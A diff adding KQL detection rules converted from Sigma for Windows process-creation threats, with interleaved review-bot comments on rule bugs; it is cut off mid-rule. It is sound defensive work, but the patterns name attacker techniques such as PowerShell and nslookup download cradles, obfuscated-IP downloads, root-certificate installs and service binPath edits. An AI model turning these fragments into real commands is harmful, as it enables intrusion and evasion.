+// Tags: attack.lateral-movement, attack.defense-evasion, attack.command-and-control, attack.t1090
+// False Positives:
+// - Legitimate administration activity
+// - WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and ((ProcessCommandLine contains "interface" and ProcessCommandLine contains "portproxy" and ProcessCommandLine contains "add" and ProcessCommandLine contains "v4tov4") or (ProcessCommandLine contains "i " and ProcessCommandLine contains "p " and ProcessCommandLine contains "a " and ProcessCommandLine contains "v ") or (ProcessCommandLine contains "connectp" and ProcessCommandLine contains "listena" and ProcessCommandLine contains "c="))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_process_created_via_taskmgr_exe.kql b/KQL/rules/windows/process_creation/new_process_created_via_taskmgr_exe.kql
new file mode 100644
index 00000000..20e8ce7a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_process_created_via_taskmgr_exe.kql
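Review bot: The second alternative, `contains "i " and contains "p " and contains "a " and contains "v "`, is meant for netsh's one-letter abbreviations (`netsh i p a v …`) but matches those substrings anywhere and in any order, so an unrelated netsh line containing tokens such as `ip`, `area` or `adv` satisfies it, while longer prefixes (`netsh int portp add v4tov4`) are covered by neither the full-word nor the one-letter alternative. netsh requires the verbs in order, so one anchored regex covers the full form, the one-letter form and every prefix in between: `ProcessCommandLine matches regex @"(?i)\bi\w*\s+p\w*\s+a\w*\s+v\w*"`, which could replace the first two alternatives while keeping the `connectp`/`listena`/`c=` one. Check it against the WSL2 bridge script named in the False Positives line before swapping it in, and route the change upstream or through an override since this file is regenerated weekly.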
@@ -0,0 +1,12 @@
+// Title: New Process Created Via Taskmgr.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-03-13
+// Level: low
+// Description: Detects the creation of a process via the Windows task manager. This might be an attempt to bypass UAC
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+// False Positives:
+// - Administrative activity
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\taskmgr.exe" and (not((FolderPath endswith ":\\Windows\\System32\\mmc.exe" or FolderPath endswith ":\\Windows\\System32\\resmon.exe" or FolderPath endswith ":\\Windows\\System32\\Taskmgr.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_process_created_via_wmic_exe.kql b/KQL/rules/windows/process_creation/new_process_created_via_wmic_exe.kql
new file mode 100644
index 00000000..44fb1394
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_process_created_via_wmic_exe.kql
@@ -0,0 +1,10 @@
+// Title: New Process Created Via Wmic.EXE
+// Author: Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects new process creation using WMIC via the "process call create" flag
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047, car.2016-03-002
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "process" and ProcessCommandLine contains "call" and ProcessCommandLine contains "create") and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_remote_desktop_connection_initiated_via_mstsc_exe.kql b/KQL/rules/windows/process_creation/new_remote_desktop_connection_initiated_via_mstsc_exe.kql
new file mode 100644
index 00000000..2e236fde
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_remote_desktop_connection_initiated_via_mstsc_exe.kql
@@ -0,0 +1,13 @@
+// Title: New Remote Desktop Connection Initiated Via Mstsc.EXE
+// Author: frack113
+// Date: 2022-01-07
+// Level: medium
+// Description: Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection to a remote server.
+// Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.001
+// False Positives:
+// - WSL (Windows Sub System For Linux)
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -v:" or ProcessCommandLine contains " /v:" or ProcessCommandLine contains " –v:" or ProcessCommandLine contains " —v:" or ProcessCommandLine contains " ―v:") and (FolderPath endswith "\\mstsc.exe" or ProcessVersionInfoOriginalFileName =~ "mstsc.exe")) and (not((ProcessCommandLine contains "C:\\ProgramData\\Microsoft\\WSL\\wslg.rdp" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lxss\\wslhost.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_root_certificate_installed_via_certmgr_exe.kql b/KQL/rules/windows/process_creation/new_root_certificate_installed_via_certmgr_exe.kql
new file mode 100644
index 00000000..5a001200
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_root_certificate_installed_via_certmgr_exe.kql
@@ -0,0 +1,13 @@
+// Title: New Root Certificate Installed Via CertMgr.EXE
+// Author: oscd.community, @redcanary, Zach Stanford @svch0st
+// Date: 2023-03-05
+// Level: medium
+// Description: Detects execution of "certmgr" with the "add" flag in order to install a new certificate on the system.
+// Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1553.004
+// False Positives:
+// - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/add" and ProcessCommandLine contains "root") and (FolderPath endswith "\\CertMgr.exe" or ProcessVersionInfoOriginalFileName =~ "CERTMGT.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_root_certificate_installed_via_certutil_exe.kql b/KQL/rules/windows/process_creation/new_root_certificate_installed_via_certutil_exe.kql
new file mode 100644
index 00000000..4835d8e4
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_root_certificate_installed_via_certutil_exe.kql
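Review bot: `ProcessVersionInfoOriginalFileName =~ "CERTMGT.EXE"` looks like a typo for CERTMGR.EXE; if it is, that alternative can never match and the rule silently degrades to the `FolderPath endswith "\\CertMgr.exe"` check alone, which a renamed binary evades. Confirm the value against the version resource of the SDK certmgr.exe and against the upstream Sigma rule, which may carry the same string, before merging. If the resource genuinely reads CERTMGT.EXE, a comment such as `// NOTE: the OriginalFileName of certmgr.exe really is "CERTMGT.EXE" — not a typo` would save the next reader the same question.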
@@ -0,0 +1,13 @@
+// Title: New Root Certificate Installed Via Certutil.EXE
+// Author: oscd.community, @redcanary, Zach Stanford @svch0st
+// Date: 2023-03-05
+// Level: medium
+// Description: Detects execution of "certutil" with the "addstore" flag in order to install a new certificate on the system.
+// Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1553.004
+// False Positives:
+// - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-addstore" or ProcessCommandLine contains "/addstore" or ProcessCommandLine contains "–addstore" or ProcessCommandLine contains "—addstore" or ProcessCommandLine contains "―addstore") and ProcessCommandLine contains "root" and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_service_creation_using_powershell.kql b/KQL/rules/windows/process_creation/new_service_creation_using_powershell.kql
new file mode 100644
index 00000000..29a821f6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_service_creation_using_powershell.kql
@@ -0,0 +1,13 @@
+// Title: New Service Creation Using PowerShell
+// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
+// Date: 2023-02-20
+// Level: low
+// Description: Detects the creation of a new service using powershell.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003
+// False Positives:
+// - Legitimate administrator or user creates a service for legitimate reasons.
+// - Software installation
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "New-Service" and ProcessCommandLine contains "-BinaryPathName"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_service_creation_using_sc_exe.kql b/KQL/rules/windows/process_creation/new_service_creation_using_sc_exe.kql
new file mode 100644
index 00000000..d92b8c78
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_service_creation_using_sc_exe.kql
@@ -0,0 +1,13 @@
+// Title: New Service Creation Using Sc.EXE
+// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
+// Date: 2023-02-20
+// Level: low
+// Description: Detects the creation of a new service using the "sc.exe" utility.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003
+// False Positives:
+// - Legitimate administrator or user creates a service for legitimate reasons.
+// - Software installation
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "create" and ProcessCommandLine contains "binPath") and FolderPath endswith "\\sc.exe") and (not((InitiatingProcessFolderPath endswith "\\Dropbox.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Dropbox\\Client\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Dropbox\\Client\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_user_created_via_net_exe.kql b/KQL/rules/windows/process_creation/new_user_created_via_net_exe.kql
new file mode 100644
index 00000000..12efcded
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_user_created_via_net_exe.kql
@@ -0,0 +1,13 @@
+// Title: New User Created Via Net.EXE
+// Author: Endgame, JHasenbusch (adapted to Sigma for oscd.community)
+// Date: 2018-10-30
+// Level: medium
+// Description: Identifies the creation of local users via the net.exe command.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1136.001
+// False Positives:
+// - Legitimate user creation.
+// - Better use event IDs for user creation rather than command line rules.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "user" and ProcessCommandLine contains "add") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_user_created_via_net_exe_with_never_expire_option.kql b/KQL/rules/windows/process_creation/new_user_created_via_net_exe_with_never_expire_option.kql
new file mode 100644
index 00000000..ca433ac1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_user_created_via_net_exe_with_never_expire_option.kql
@@ -0,0 +1,12 @@
+// Title: New User Created Via Net.EXE With Never Expire Option
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-12
+// Level: high
+// Description: Detects creation of local users via the net.exe command with the option "never expire"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1136.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "user" and ProcessCommandLine contains "add" and ProcessCommandLine contains "expires:never") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_virtual_smart_card_created_via_tpmvscmgr_exe.kql b/KQL/rules/windows/process_creation/new_virtual_smart_card_created_via_tpmvscmgr_exe.kql
new file mode 100644
index 00000000..cdae2f59
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_virtual_smart_card_created_via_tpmvscmgr_exe.kql
@@ -0,0 +1,12 @@
+// Title: New Virtual Smart Card Created Via TpmVscMgr.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-15
+// Level: medium
+// Description: Detects execution of "Tpmvscmgr.exe" to create a new virtual smart card.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Legitimate usage by an administrator
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "create" and (FolderPath endswith "\\tpmvscmgr.exe" and ProcessVersionInfoOriginalFileName =~ "TpmVscMgr.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/nltest_exe_execution.kql b/KQL/rules/windows/process_creation/nltest_exe_execution.kql
new file mode 100644
index 00000000..2f4f7e57
--- /dev/null
+++ b/KQL/rules/windows/process_creation/nltest_exe_execution.kql
@@ -0,0 +1,12 @@
+// Title: Nltest.EXE Execution
+// Author: Arun Chauhan
+// Date: 2023-02-03
+// Level: low
+// Description: Detects nltest commands that can be used for information discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1016, attack.t1018, attack.t1482
+// False Positives:
+// - Legitimate administration activity
+
+DeviceProcessEvents
+| where FolderPath endswith "\\nltest.exe" or ProcessVersionInfoOriginalFileName =~ "nltestrk.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/node_process_executions.kql b/KQL/rules/windows/process_creation/node_process_executions.kql
new file mode 100644
index 00000000..0d7faa39
--- /dev/null
+++ b/KQL/rules/windows/process_creation/node_process_executions.kql
@@ -0,0 +1,10 @@
+// Title: Node Process Executions
+// Author: Max Altgelt (Nextron Systems)
+// Date: 2022-04-06
+// Level: medium
+// Description: Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1127, attack.t1059.007
+
+DeviceProcessEvents
+| where FolderPath endswith "\\Adobe Creative Cloud Experience\\libs\\node.exe" and (not(ProcessCommandLine contains "Adobe Creative Cloud Experience\\js"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/nodejs_execution_of_javascript_file.kql b/KQL/rules/windows/process_creation/nodejs_execution_of_javascript_file.kql
new file mode 100644
index 00000000..589c7d9f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/nodejs_execution_of_javascript_file.kql
@@ -0,0 +1,15 @@
+// Title: NodeJS Execution of JavaScript File
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-04-21
+// Level: low
+// Description: Detects execution of JavaScript or JSC files using NodeJs binary node.exe, that could be potentially suspicious.
+// Node.js is a popular open-source JavaScript runtime that runs code outside browsers and is widely used for both frontend and backend development.
+// Adversaries have been observed abusing Node.js to disguise malware as legitimate processes, evade security defenses, and maintain persistence within target systems.
+// Because Node.js is commonly used, this rule may generate false positives in some environments. However, if such activity is unusual in your environment, it is highly suspicious and warrants immediate investigation.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.007
+// False Positives:
+// - Legitimate use of node.exe to execute JavaScript or JSC files on your environment
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ".js" and (FolderPath endswith "\\node.exe" or ProcessVersionInfoOriginalFileName =~ "node.exe" or ProcessVersionInfoProductName =~ "Node.js")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/non_interactive_powershell_process_spawned.kql b/KQL/rules/windows/process_creation/non_interactive_powershell_process_spawned.kql
new file mode 100644
index 00000000..c25b5fad
--- /dev/null
+++ b/KQL/rules/windows/process_creation/non_interactive_powershell_process_spawned.kql
@@ -0,0 +1,12 @@
+// Title: Non Interactive PowerShell Process Spawned
+// Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
+// Date: 2019-09-12
+// Level: low
+// Description: Detects non-interactive PowerShell activity by looking at the "powershell" process with a non-user GUI process such as "explorer.exe" as a parent.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Likely. Many admin scripts and tools leverage PowerShell in their BAT or VB scripts which may trigger this rule often. It is best to add additional filters or use this to hunt for anomalies
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (not(((InitiatingProcessFolderPath endswith ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\CompatTelRunner.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\explorer.exe") or InitiatingProcessFolderPath =~ ":\\$WINDOWS.~BT\\Sources\\SetupHost.exe"))) and (not(((InitiatingProcessFolderPath contains ":\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_" and InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe") or (InitiatingProcessCommandLine contains " --ms-enable-electron-run-as-node " and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/non_privileged_usage_of_reg_or_powershell.kql b/KQL/rules/windows/process_creation/non_privileged_usage_of_reg_or_powershell.kql
new file mode 100644
index 00000000..9c99873a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/non_privileged_usage_of_reg_or_powershell.kql
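Review bot: The SetupHost exclusion in the `where` clause can never match, because `InitiatingProcessFolderPath =~ ":\\$WINDOWS.~BT\\Sources\\SetupHost.exe"` compares the full parent path for equality against a value that begins at the drive colon, while the three neighbouring exclusions use `endswith` for values of exactly the same `:\\Windows\\...` shape. Unless the upstream Sigma rule really intends an exact match, the converted clause should read `InitiatingProcessFolderPath endswith ":\\$WINDOWS.~BT\\Sources\\SetupHost.exe"` so that PowerShell launched by Windows setup is actually filtered out instead of producing a hit on every in-place upgrade. Since this file is generated, the fix presumably belongs in the converter's handling of a bare (non-modifier) value that starts with `:\`, and the same check is worth running over the other generated rules.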
@@ -0,0 +1,10 @@
+// Title: Non-privileged Usage of Reg or Powershell
+// Author: Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community
+// Date: 2020-10-05
+// Level: high
+// Description: Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "reg " and ProcessCommandLine contains "add") or (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "set-itemproperty" or ProcessCommandLine contains " sp " or ProcessCommandLine contains "new-itemproperty")) and ((ProcessCommandLine contains "ImagePath" or ProcessCommandLine contains "FailureCommand" or ProcessCommandLine contains "ServiceDLL") and (ProcessCommandLine contains "ControlSet" and ProcessCommandLine contains "Services") and (ProcessIntegrityLevel in~ ("Medium", "S-1-16-8192")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/notepad_password_files_discovery.kql b/KQL/rules/windows/process_creation/notepad_password_files_discovery.kql
new file mode 100644
index 00000000..ea16fd51
--- /dev/null
+++ b/KQL/rules/windows/process_creation/notepad_password_files_discovery.kql
@@ -0,0 +1,12 @@
+// Title: Notepad Password Files Discovery
+// Author: The DFIR Report
+// Date: 2025-02-21
+// Level: low
+// Description: Detects the execution of Notepad to open a file that has the string "password" which may indicate unauthorized access to credentials or suspicious activity.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+// False Positives:
+// - Legitimate use of opening files from remote hosts by administrators or users. However, storing passwords in text readable format could potentially be a violation of the organization's policy. Any match should be investigated further.
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "password" and ProcessCommandLine contains ".txt") or (ProcessCommandLine contains "password" and ProcessCommandLine contains ".csv") or (ProcessCommandLine contains "password" and ProcessCommandLine contains ".doc") or (ProcessCommandLine contains "password" and ProcessCommandLine contains ".xls")) and FolderPath endswith "\\notepad.exe" and InitiatingProcessFolderPath endswith "\\explorer.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/nslookup_powershell_download_cradle_processcreation.kql b/KQL/rules/windows/process_creation/nslookup_powershell_download_cradle_processcreation.kql
new file mode 100644
index 00000000..dfd8fdbb
--- /dev/null
+++ b/KQL/rules/windows/process_creation/nslookup_powershell_download_cradle_processcreation.kql
@@ -0,0 +1,10 @@
+// Title: Nslookup PowerShell Download Cradle - ProcessCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-05
+// Level: medium
+// Description: Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -q=txt " or ProcessCommandLine contains " -querytype=txt ") and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) and (FolderPath contains "\\nslookup.exe" or ProcessVersionInfoOriginalFileName =~ "\\nslookup.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/ntdllpipe_like_activity_execution.kql b/KQL/rules/windows/process_creation/ntdllpipe_like_activity_execution.kql
new file mode 100644
index 00000000..de464966
--- /dev/null
+++ b/KQL/rules/windows/process_creation/ntdllpipe_like_activity_execution.kql
@@ -0,0 +1,10 @@
+// Title: NtdllPipe Like Activity Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-05
+// Level: high
+// Description: Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "type %windir%\\system32\\ntdll.dll" or ProcessCommandLine contains "type %systemroot%\\system32\\ntdll.dll" or ProcessCommandLine contains "type c:\\windows\\system32\\ntdll.dll" or ProcessCommandLine contains "\\ntdll.dll > \\\\.\\pipe\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/obfuscated_ip_download_activity.kql b/KQL/rules/windows/process_creation/obfuscated_ip_download_activity.kql
new file mode 100644
index 00000000..0301a460
--- /dev/null
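Review bot: The second alternative of the image test in the nslookup rule, `ProcessVersionInfoOriginalFileName =~ "\\nslookup.exe"`, cannot match: that field carries a bare file name from the PE version resource, so the leading backslash makes the clause dead and the rule rests entirely on `FolderPath contains "\\nslookup.exe"`, which is in turn looser than the `endswith` every sibling rule in this batch uses for the same purpose. Suggest `(FolderPath endswith "\\nslookup.exe" or ProcessVersionInfoOriginalFileName =~ "nslookup.exe")`. The backslash may already be present in the upstream Sigma value rather than introduced here; if so, a normalisation step in the converter (strip a leading path separator from OriginalFileName values) is the right fix rather than a hand edit of generated output.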
+++ b/KQL/rules/windows/process_creation/obfuscated_ip_download_activity.kql
@@ -0,0 +1,10 @@
+// Title: Obfuscated IP Download Activity
+// Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2022-08-03
+// Level: medium
+// Description: Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command
+// MITRE Tactic: Discovery
+// Tags: attack.discovery
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "Invoke-RestMethod" or ProcessCommandLine contains "irm " or ProcessCommandLine contains "wget " or ProcessCommandLine contains "curl " or ProcessCommandLine contains "DownloadFile" or ProcessCommandLine contains "DownloadString") and ((ProcessCommandLine contains " 0x" or ProcessCommandLine contains "//0x" or ProcessCommandLine contains ".0x" or ProcessCommandLine contains ".00x") or (ProcessCommandLine contains "http://%" and ProcessCommandLine contains "%2e") or (ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.[0-9]{1,3}\\.0[0-9]{3,4}" or ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.0[0-9]{3,7}" or ProcessCommandLine matches regex "https?://0[0-9]{3,11}" or ProcessCommandLine matches regex "https?://(0[0-9]{1,11}\\.){3}0[0-9]{1,11}" or ProcessCommandLine matches regex "https?://0[0-9]{1,11}" or ProcessCommandLine matches regex " [0-7]{7,13}")) and (not(ProcessCommandLine matches regex "https?://((25[0-5]|(2[0-4]|1\\d|[1-9])?\\d)(\\.|\\b)){4}"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/obfuscated_ip_via_cli.kql b/KQL/rules/windows/process_creation/obfuscated_ip_via_cli.kql
new file mode 100644
index 00000000..f664129c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/obfuscated_ip_via_cli.kql
@@ -0,0 +1,10 @@
+// Title: Obfuscated IP Via CLI
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2022-08-03
+// Level: medium
+// Description: Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line
+// MITRE Tactic: Discovery
+// Tags: attack.discovery
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\ping.exe" or FolderPath endswith "\\arp.exe") and ((ProcessCommandLine contains " 0x" or ProcessCommandLine contains "//0x" or ProcessCommandLine contains ".0x" or ProcessCommandLine contains ".00x") or (ProcessCommandLine contains "http://%" and ProcessCommandLine contains "%2e") or (ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.[0-9]{1,3}\\.0[0-9]{3,4}" or ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.0[0-9]{3,7}" or ProcessCommandLine matches regex "https?://0[0-9]{3,11}" or ProcessCommandLine matches regex "https?://(0[0-9]{1,11}\\.){3}0[0-9]{1,11}" or ProcessCommandLine matches regex "https?://0[0-9]{1,11}" or ProcessCommandLine matches regex " [0-7]{7,13}")) and (not(ProcessCommandLine matches regex "https?://((25[0-5]|(2[0-4]|1\\d|[1-9])?\\d)(\\.|\\b)){4}"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql b/KQL/rules/windows/process_creation/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql
new file mode 100644
index 00000000..68f83ce2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql
@@ -0,0 +1,14 @@
+// Title: Obfuscated PowerShell MSI Install via WindowsInstaller COM
+// Author: Meroujan Antonyan (vx3r)
+// Date: 2025-05-27
+// Level: high
+// Description: Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (`WindowsInstaller.Installer`).
+// The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting
+// malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection
+// by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of `InstallProduct` and COM object creation, particularly combined with
+// hidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.010, attack.t1218.007, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-ComObject" and ProcessCommandLine contains "InstallProduct(" and ProcessCommandLine contains ".Insert(" and ProcessCommandLine contains "UILevel") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell_ISE.EXE", "PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/obfuscated_powershell_oneliner_execution.kql b/KQL/rules/windows/process_creation/obfuscated_powershell_oneliner_execution.kql
new file mode 100644
index 00000000..ce369ca5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/obfuscated_powershell_oneliner_execution.kql
@@ -0,0 +1,10 @@
+// Title: Obfuscated PowerShell OneLiner Execution
+// Author: @Kostastsale, TheDFIRReport
+// Date: 2022-05-09
+// Level: high
+// Description: Detects the execution of a specific OneLiner to download and execute powershell modules in memory.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1562.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "http://127.0.0.1" and ProcessCommandLine contains "%{(IRM $_)}" and ProcessCommandLine contains "Invoke") and FolderPath endswith "\\powershell.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/odbcconf_exe_suspicious_dll_location.kql b/KQL/rules/windows/process_creation/odbcconf_exe_suspicious_dll_location.kql
new file mode 100644
index 00000000..50efda01
--- /dev/null
+++ b/KQL/rules/windows/process_creation/odbcconf_exe_suspicious_dll_location.kql
@@ -0,0 +1,12 @@
+// Title: Odbcconf.EXE Suspicious DLL Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-22
+// Level: high
+// Description: Detects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.008
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Registration\\CRMLog" or ProcessCommandLine contains ":\\Windows\\System32\\com\\dmp\\" or ProcessCommandLine contains ":\\Windows\\System32\\FxsTmp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\drivers\\color\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\PRINTERS\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\SERVERS\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks_Migrated\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\com\\dmp\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\FxsTmp\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\" or ProcessCommandLine contains 